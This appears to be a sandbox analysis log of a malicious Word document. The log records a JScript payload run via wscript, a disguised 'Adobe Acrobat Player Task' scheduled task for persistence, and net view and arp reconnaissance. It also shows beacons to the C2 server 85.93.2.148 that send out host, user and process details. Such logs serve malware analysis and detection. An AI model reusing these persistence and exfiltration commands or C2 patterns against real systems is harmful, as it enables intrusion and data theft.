Source: WINWORD.EXE | String found in binary or memory: file:/// |
Source: WINWORD.EXE | String found in binary or memory: file:///%f |
Source: WINWORD.EXE | String found in binary or memory: file:///C: |
Source: WINWORD.EXE | String found in binary or memory: file:///C:/Users/user/Desktop/adjusted_records.doc |
Source: WINWORD.EXE | String found in binary or memory: file:///C:/Users/user/Desktop/adjusted_records.doc)) |
Source: wscript.exe | String found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q |
Source: wscript.exe | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06 |
Source: wscript.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.entrust.net/server1.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.use |
Source: wscript.exe | String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0) |
Source: wscript.exe | String found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$ |
Source: wscript.exe | String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0 |
Source: WINWORD.EXE | String found in binary or memory: http://ns.ad |
Source: WINWORD.EXE | String found in binary or memory: http://ns.adbe. |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0% |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0- |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0/ |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com05 |
Source: wscript.exe | String found in binary or memory: http://ocsp.entrust.net03 |
Source: wscript.exe | String found in binary or memory: http://ocsp.entrust.net0D |
Source: WINWORD.EXE | String found in binary or memory: http://p |
Source: wscript.exe | String found in binary or memory: http://www.digicert.com.my/cps.htm02 |
Source: wscript.exe | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0 |
Source: WINWORD.EXE | String found in binary or memory: http://www.msnusers.com |
Source: wscript.exe | String found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0 |
Source: wscript.exe | String found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0 |
Source: wscript.exe | String found in binary or memory: http://www.usertrust.com1 |
Source: wscript.exe | String found in binary or memory: https:// |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_information |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_informationBK |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_informationY |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_informationx |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_process_list |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_process_listX |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=waitl |
Source: wscript.exe | String found in binary or memory: https://97 |
Source: wscript.exe | String found in binary or memory: https://secure.comodo.com/CPS0 |
Source: 192.168.1.16:49163 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893& |
Source: 192.168.1.16:49164 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893& |
Source: 192.168.1.16:49168 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInf |
Source: 192.168.1.16:49168 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information computer (computername): Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADIn |
Source: 192.168.1.16:49168 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information user (username): Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInfo |
Source: 192.168.1.16:49169 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInf |
Source: 192.168.1.16:49169 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information computer (computername): Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADIn |
Source: 192.168.1.16:49169 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information user (username): Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInfo |
Source: 192.168.1.16:49170 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893& |
Source: 192.168.1.16:49171 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=System Idle Process*0|System*4|smss.exe*200|csrss.exe*276|wininit.exe*312|csrss.exe*320|winlogon.exe*34 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\adjusted_records.doc |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini |
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini |
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1 |
Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {6C8EBD0A-6843-4E76-AA78-1A12EAE50432} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[1] |
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml' |
Source: unknown | Process created: C:\Windows\System32\net.exe net view |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml' |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml' |
Source: unknown | Process created: C:\Windows\System32\ARP.EXE arp -a |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml' |
Source: unknown | Process created: C:\Windows\System32\ARP.EXE arp -a |
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1 |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml' |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml' |
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log |
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml' |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml' |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ARP.EXE arp -a |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ARP.EXE arp -a |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |